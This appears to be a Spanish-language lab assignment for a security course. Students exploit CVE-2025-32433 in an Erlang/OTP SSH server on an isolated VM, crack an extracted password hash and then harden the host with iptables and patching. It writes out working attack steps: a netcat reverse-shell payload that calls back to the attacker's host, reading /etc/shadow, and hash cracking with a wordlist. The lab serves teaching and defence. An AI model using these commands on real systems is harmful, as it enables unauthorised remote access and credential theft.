
Este proyecto simula un escenario real de ataque y defensa en dos máquinas virtuales. Explotarás una vulnerabilidad crítica de RCE previa a la autenticación (CVE-2025-32433) en un servidor SSH de Erlang/OTP, descifrarás los hashes de contraseñas extraídos y luego fortalecerás la máquina víctima con reglas de firewall y parches.
Puntos Totales: 20 | Fecha Límite: No se aceptan entregas tardías
Este proyecto simula un escenario real de ataque y defensa en dos máquinas virtuales. Explotarás una vulnerabilidad crítica de RCE antes de la autenticación (CVE-2025-32433) en un servidor SSH Erlang/OTP, descifrarás hashes de contraseñas extraídos y luego fortalecerás la máquina víctima con reglas de firewall y parches.
| Rol | SO |
|---|---|
| Atacante | Kali Linux |
| Víctima | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| Archivo | Descripción |
|---|---|
Debian-1.ova | Imagen de VM víctima preconstruida — descárgala por separado, consulta Recursos (demasiado grande para GitHub) |
rockyou_txt.txt | Lista de palabras utilizada con John the Ripper para descifrar el hash de contraseña extraído |
Debian-1.ova): Enlace de descarga — demasiado grande (~3 GB) para alojar en GitHub. Descárgala por separado e impórtala en VirtualBox/VMware como se describe a continuación.rockyou_txt.txt): incluida en este repositorio, utilizada para el paso de descifrado de contraseñas en la Parte 2.Debian-1.ova y tu MV de Kali Linux en VirtualBox/VMware.ifconfig para encontrar su IP (normalmente en 192.168.56.0/24).nmap -p 2222 -sV -A <victim-IP>
Documenta los puertos abiertos, las versiones de servicios y las firmas de Erlang.
Cambia temporalmente Kali a NAT para clonar el repositorio, luego vuelve a Solo-Anfitrión.
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
Edita el script — establece HOST = "<victim-IP>" y actualiza el payload:
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
Terminal 1 (Kali) — inicia el listener:
nc -lvnp 4444
Terminal 2 (Kali) — lanza el exploit:
python3 CVE-2025-32433.py
En la shell inversa, ejecuta whoami y hostname para confirmar el acceso.
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt
# On Kali
john --wordlist=rockyou_txt.txt hash.txt
Documenta el formato del hash (ej., $6$ = SHA-512), el tiempo empleado y la contraseña en texto plano recuperada.
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
Vuelve a ejecutar el escaneo de Nmap y el exploit desde Kali — documenta que el puerto 2222 ahora aparece como "Filtered" y el exploit falla.
Documenta los pasos para actualizar Erlang/OTP a v27.3.3 o posterior, que contiene la corrección para CVE-2025-32433.
whoami/hostname), captura de banderaCVE-2025-32433 — Ejecución remota de código crítica sin autenticación en el servidor SSH Erlang/OTP. Explotable enviando paquetes SSH malformados antes de cualquier intercambio de credenciales, otorgando a un atacante no autenticado acceso completo a una shell.